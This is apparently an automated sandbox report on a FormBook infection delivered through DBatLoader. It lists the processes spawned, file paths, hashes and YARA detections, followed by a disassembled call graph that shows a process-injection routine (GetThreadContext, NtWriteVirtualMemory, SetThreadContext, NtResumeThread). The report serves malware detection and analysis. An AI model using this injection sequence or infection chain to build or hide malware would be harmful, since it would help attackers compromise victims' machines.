                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:05:52:08
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:05:52:08
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Imagebase:0x400000
                                                                                        File size:175'800 bytes
                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:05:52:18
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\Lwnkboxd.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Lwnkboxd.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'444'352 bytes
                                                                                        MD5 hash:9E67C73F86B034D009280AB03DB20124
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.1919328602.0000000002326000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 63%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:05:52:19
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:05:52:19
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:05:52:19
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Imagebase:0x400000
                                                                                        File size:175'800 bytes
                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:05:52:29
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\Lwnkboxd.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Lwnkboxd.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'444'352 bytes
                                                                                        MD5 hash:9E67C73F86B034D009280AB03DB20124
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:05:52:29
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:05:52:29
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:05:52:30
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Imagebase:0x400000
                                                                                        File size:175'800 bytes
                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:05:52:38
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:05:52:40
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\proquota.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                        Imagebase:0xd20000
                                                                                        File size:39'424 bytes
                                                                                        MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:05:52:49
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:05:52:52
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\proquota.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                        Imagebase:0xd20000
                                                                                        File size:39'424 bytes
                                                                                        MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:05:52:59
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:05:53:12
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:15.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:10%
                                                                                          Total number of Nodes:300
                                                                                          Total number of Limit Nodes:20
                                                                                          execution_graph 25071 29567c4 25888 293480c 25071->25888 25889 293481d 25888->25889 25890 2934843 25889->25890 25891 293485a 25889->25891 25897 2934b78 25890->25897 25906 2934570 25891->25906 25894 293488b 25895 2934850 25895->25894 25911 2934500 25895->25911 25898 2934b85 25897->25898 25905 2934bb5 25897->25905 25900 2934bae 25898->25900 25902 2934b91 25898->25902 25903 2934570 11 API calls 25900->25903 25901 2934b9f 25901->25895 25917 2932c44 11 API calls 25902->25917 25903->25905 25918 29344ac 25905->25918 25907 2934574 25906->25907 25908 2934598 25906->25908 25931 2932c10 25907->25931 25908->25895 25910 2934581 25910->25895 25912 2934504 25911->25912 25915 2934514 25911->25915 25914 2934570 11 API calls 25912->25914 25912->25915 25913 2934542 25913->25894 25914->25915 25915->25913 25916 2932c2c 11 API calls 25915->25916 25916->25913 25917->25901 25919 29344b2 25918->25919 25920 29344cd 25918->25920 25919->25920 25922 2932c2c 25919->25922 25920->25901 25923 2932c3a 25922->25923 25925 2932c30 25922->25925 25923->25920 25924 2932d19 25930 2932ce8 7 API calls 25924->25930 25925->25923 25925->25924 25929 29364cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25925->25929 25928 2932d3a 25928->25920 25929->25924 25930->25928 25932 2932c27 25931->25932 25935 2932c14 25931->25935 25932->25910 25933 2932c1e 25933->25910 25934 2932d19 25940 2932ce8 7 API calls 25934->25940 25935->25933 25935->25934 25939 29364cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25935->25939 25938 2932d3a 25938->25910 25939->25934 25940->25938 25941 295bb44 25944 294ec74 25941->25944 25945 294ec7c 25944->25945 25945->25945 28931 294870c LoadLibraryW 25945->28931 25947 294ec9e 28936 2932ee0 QueryPerformanceCounter 25947->28936 25949 294eca3 25950 294ecad InetIsOffline 25949->25950 25951 294ecb7 25950->25951 25952 294ecc8 25950->25952 25953 2934500 11 API calls 25951->25953 25954 2934500 11 API calls 25952->25954 25955 294ecc6 25953->25955 25954->25955 25956 293480c 11 API calls 25955->25956 25957 294ecf5 25956->25957 25958 294ecfd 25957->25958 28939 2934798 25958->28939 25960 294ed20 25961 294ed28 25960->25961 25962 294ed32 25961->25962 28954 2948824 25962->28954 25965 293480c 11 API calls 25966 294ed59 25965->25966 25967 294ed61 25966->25967 25968 2934798 11 API calls 25967->25968 25969 294ed84 25968->25969 25970 294ed8c 25969->25970 28967 29346a4 25970->28967 28969 29480c8 28931->28969 28933 2948745 28980 2947d00 28933->28980 28937 2932ef8 GetTickCount 28936->28937 28938 2932eed 28936->28938 28937->25949 28938->25949 28940 29347fd 28939->28940 28941 293479c 28939->28941 28942 2934500 28941->28942 28943 29347a4 28941->28943 28947 2934570 11 API calls 28942->28947 28949 2934514 28942->28949 28943->28940 28944 29347b3 28943->28944 28946 2934500 11 API calls 28943->28946 28948 2934570 11 API calls 28944->28948 28945 2934542 28945->25960 28946->28944 28947->28949 28951 29347cd 28948->28951 28949->28945 28950 2932c2c 11 API calls 28949->28950 28950->28945 28952 2934500 11 API calls 28951->28952 28953 29347f9 28952->28953 28953->25960 28955 2948838 28954->28955 28956 2948857 LoadLibraryA 28955->28956 28957 2948867 28956->28957 28958 2948020 17 API calls 28957->28958 28959 294886d 28958->28959 28960 29480c8 15 API calls 28959->28960 28961 2948886 28960->28961 28962 2947d00 18 API calls 28961->28962 28963 29488e5 FreeLibrary 28962->28963 28964 29488fd 28963->28964 28965 29344d0 11 API calls 28964->28965 28966 294890a 28965->28966 28966->25965 28968 29346aa 28967->28968 28970 2934500 11 API calls 28969->28970 28971 29480ed 28970->28971 28994 2947914 28971->28994 28974 2934798 11 API calls 28975 2948107 28974->28975 28976 294810f GetModuleHandleW GetProcAddress GetProcAddress 28975->28976 28977 2948142 28976->28977 29000 29344d0 28977->29000 28981 2934500 11 API calls 28980->28981 28982 2947d25 28981->28982 28983 2947914 12 API calls 28982->28983 28984 2947d32 28983->28984 28985 2934798 11 API calls 28984->28985 28986 2947d42 28985->28986 29005 2948020 28986->29005 28989 29480c8 15 API calls 28990 2947d5b NtWriteVirtualMemory 28989->28990 28991 2947d87 28990->28991 28992 29344d0 11 API calls 28991->28992 28993 2947d94 FreeLibrary 28992->28993 28993->25947 28995 2947925 28994->28995 28996 2934b78 11 API calls 28995->28996 28998 2947935 28996->28998 28997 29479a1 28997->28974 28998->28997 29004 293ba44 CharNextA 28998->29004 29001 29344d6 29000->29001 29002 29344fc 29001->29002 29003 2932c2c 11 API calls 29001->29003 29002->28933 29003->29001 29004->28998 29006 2934500 11 API calls 29005->29006 29007 2948043 29006->29007 29008 2947914 12 API calls 29007->29008 29009 2948050 29008->29009 29010 2948058 GetModuleHandleA 29009->29010 29011 29480c8 15 API calls 29010->29011 29012 2948069 GetModuleHandleA 29011->29012 29013 2948087 29012->29013 29014 29344ac 11 API calls 29013->29014 29015 2947d55 29014->29015 29015->28989 29016 295c2fc 29026 2936518 29016->29026 29020 295c32a 29031 295bb50 timeSetEvent 29020->29031 29022 295c334 29023 295c342 GetMessageA 29022->29023 29024 295c336 TranslateMessage DispatchMessageA 29023->29024 29025 295c352 29023->29025 29024->29023 29027 2936523 29026->29027 29032 2934168 29027->29032 29030 293427c SysAllocStringLen SysFreeString SysReAllocStringLen 29030->29020 29031->29022 29033 29341ae 29032->29033 29034 2934227 29033->29034 29035 29343b8 29033->29035 29046 2934100 29034->29046 29038 29343e9 29035->29038 29041 29343fa 29035->29041 29051 293432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29038->29051 29040 29343f3 29040->29041 29042 293443f FreeLibrary 29041->29042 29043 2934463 29041->29043 29042->29041 29044 2934472 ExitProcess 29043->29044 29045 293446c 29043->29045 29045->29044 29047 2934110 29046->29047 29048 2934143 29046->29048 29047->29048 29052 2935814 29047->29052 29056 29315cc 29047->29056 29048->29030 29051->29040 29053 2935824 GetModuleFileNameA 29052->29053 29055 2935840 29052->29055 29060 2935a78 GetModuleFileNameA RegOpenKeyExA 29053->29060 29055->29047 29079 2931560 29056->29079 29058 29315d4 VirtualAlloc 29059 29315eb 29058->29059 29059->29047 29061 2935afb 29060->29061 29062 2935abb RegOpenKeyExA 29060->29062 29078 29358b4 12 API calls 29061->29078 29062->29061 29063 2935ad9 RegOpenKeyExA 29062->29063 29063->29061 29066 2935b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29063->29066 29065 2935b20 RegQueryValueExA 29067 2935b5e RegCloseKey 29065->29067 29068 2935b40 RegQueryValueExA 29065->29068 29069 2935bbb 29066->29069 29070 2935c9e 29066->29070 29067->29055 29068->29067 29069->29070 29072 2935bcb lstrlenA 29069->29072 29070->29055 29073 2935be3 29072->29073 29073->29070 29074 2935c30 29073->29074 29075 2935c08 lstrcpynA LoadLibraryExA 29073->29075 29074->29070 29076 2935c3a lstrcpynA LoadLibraryExA 29074->29076 29075->29074 29076->29070 29077 2935c6c lstrcpynA LoadLibraryExA 29076->29077 29077->29070 29078->29065 29080 2931500 29079->29080 29080->29058 29081 2934e88 29082 2934e95 29081->29082 29086 2934e9c 29081->29086 29090 2934bdc SysAllocStringLen 29082->29090 29087 2934bfc 29086->29087 29088 2934c02 SysFreeString 29087->29088 29089 2934c08 29087->29089 29088->29089 29090->29086 29091 2934c48 29092 2934c6f 29091->29092 29093 2934c4c 29091->29093 29094 2934c0c 29093->29094 29097 2934c5f SysReAllocStringLen 29093->29097 29095 2934c12 SysFreeString 29094->29095 29096 2934c20 29094->29096 29095->29096 29097->29092 29098 2934bdc 29097->29098 29099 2934bf8 29098->29099 29100 2934be8 SysAllocStringLen 29098->29100 29100->29098 29100->29099 29101 2931c6c 29102 2931d04 29101->29102 29103 2931c7c 29101->29103 29106 2931f58 29102->29106 29107 2931d0d 29102->29107 29104 2931cc0 29103->29104 29105 2931c89 29103->29105 29108 2931724 10 API calls 29104->29108 29109 2931c94 29105->29109 29149 2931724 29105->29149 29110 2931fec 29106->29110 29112 2931f68 29106->29112 29113 2931fac 29106->29113 29115 2931e24 29107->29115 29116 2931d25 29107->29116 29118 2931cd7 29108->29118 29121 2931724 10 API calls 29112->29121 29120 2931fb2 29113->29120 29125 2931724 10 API calls 29113->29125 29114 2931e7c 29122 2931724 10 API calls 29114->29122 29134 2931e95 29114->29134 29115->29114 29130 2931e55 Sleep 29115->29130 29115->29134 29117 2931d2c 29116->29117 29123 2931d48 29116->29123 29124 2931dfc 29116->29124 29119 2931cfd 29118->29119 29138 2931a8c 8 API calls 29118->29138 29139 2931f82 29121->29139 29136 2931f2c 29122->29136 29127 2931d79 Sleep 29123->29127 29141 2931d9c 29123->29141 29128 2931724 10 API calls 29124->29128 29140 2931fc1 29125->29140 29126 2931cb9 29131 2931d91 Sleep 29127->29131 29127->29141 29144 2931e05 29128->29144 29129 2931fa7 29130->29114 29133 2931e6f Sleep 29130->29133 29131->29123 29132 2931ca1 29132->29126 29173 2931a8c 29132->29173 29133->29115 29136->29134 29143 2931a8c 8 API calls 29136->29143 29137 2931e1d 29138->29119 29139->29129 29142 2931a8c 8 API calls 29139->29142 29140->29129 29145 2931a8c 8 API calls 29140->29145 29142->29129 29146 2931f50 29143->29146 29144->29137 29147 2931a8c 8 API calls 29144->29147 29148 2931fe4 29145->29148 29147->29137 29150 2931968 29149->29150 29151 293173c 29149->29151 29152 2931938 29150->29152 29153 2931a80 29150->29153 29160 29317cb Sleep 29151->29160 29161 293174e 29151->29161 29159 2931947 Sleep 29152->29159 29166 2931986 29152->29166 29154 2931684 VirtualAlloc 29153->29154 29155 2931a89 29153->29155 29157 29316bf 29154->29157 29158 29316af 29154->29158 29155->29132 29156 293175d 29156->29132 29157->29132 29190 2931644 29158->29190 29164 293195d Sleep 29159->29164 29159->29166 29160->29161 29165 29317e4 Sleep 29160->29165 29161->29156 29162 293182c 29161->29162 29167 293180a Sleep 29161->29167 29168 2931838 29162->29168 29172 29315cc VirtualAlloc 29162->29172 29164->29152 29165->29151 29169 29319a4 29166->29169 29170 29315cc VirtualAlloc 29166->29170 29167->29162 29171 2931820 Sleep 29167->29171 29168->29132 29169->29132 29170->29169 29171->29161 29172->29168 29174 2931b6c 29173->29174 29177 2931aa1 29173->29177 29175 29316e8 29174->29175 29176 2931aa7 29174->29176 29180 2931c66 29175->29180 29181 2931644 2 API calls 29175->29181 29179 2931ab0 29176->29179 29183 2931b4b Sleep 29176->29183 29187 2931b81 29176->29187 29177->29176 29178 2931b13 Sleep 29177->29178 29178->29176 29182 2931b2d Sleep 29178->29182 29179->29126 29180->29126 29184 29316f5 VirtualFree 29181->29184 29182->29177 29185 2931b61 Sleep 29183->29185 29183->29187 29186 293170d 29184->29186 29185->29176 29186->29126 29188 2931c00 VirtualFree 29187->29188 29189 2931ba4 29187->29189 29188->29126 29189->29126 29191 2931681 29190->29191 29192 293164d 29190->29192 29191->29157 29192->29191 29193 293164f Sleep 29192->29193 29194 2931664 29193->29194 29194->29191 29195 2931668 Sleep 29194->29195 29195->29192

                                                                                          Executed Functions

                                                                                          Function 02948BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 6797 2948bb0-2948bb3 6798 2948bb8-2948bbd 6797->6798 6798->6798 6799 2948bbf-2948ca6 call 293493c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 6798->6799 6830 294a6f7-294a761 call 29344d0 * 2 call 2934c0c call 29344d0 call 29344ac call 29344d0 * 2 6799->6830 6831 2948cac-2948d87 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 6799->6831 6831->6830 6875 2948d8d-29490b5 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29330d4 * 2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934d8c call 2934d9c call 29485dc 6831->6875 6984 29490b7-2949123 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 6875->6984 6985 2949128-2949449 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2932ee0 call 2932f08 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 GetThreadContext 6875->6985 6984->6985 6985->6830 7093 294944f-29496b2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2948254 6985->7093 7166 29499bf-2949a2b call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7093->7166 7167 29496b8-2949821 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29484c4 7093->7167 7194 2949a30-2949bb0 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29479b4 7166->7194 7257 2949823-2949849 call 29479b4 7167->7257 7258 294984b-29498b7 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7167->7258 7194->6830 7298 2949bb6-2949caf call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2948ac0 7194->7298 7266 29498bc-29499b3 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29479b4 7257->7266 7258->7266 7337 29499b8-29499bd 7266->7337 7349 2949cb1-2949cfe call 29489b8 call 29489ac 7298->7349 7350 2949d03-294a45b call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947d00 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947d00 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 SetThreadContext NtResumeThread call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2932c2c call 293480c call 293494c call 29346a4 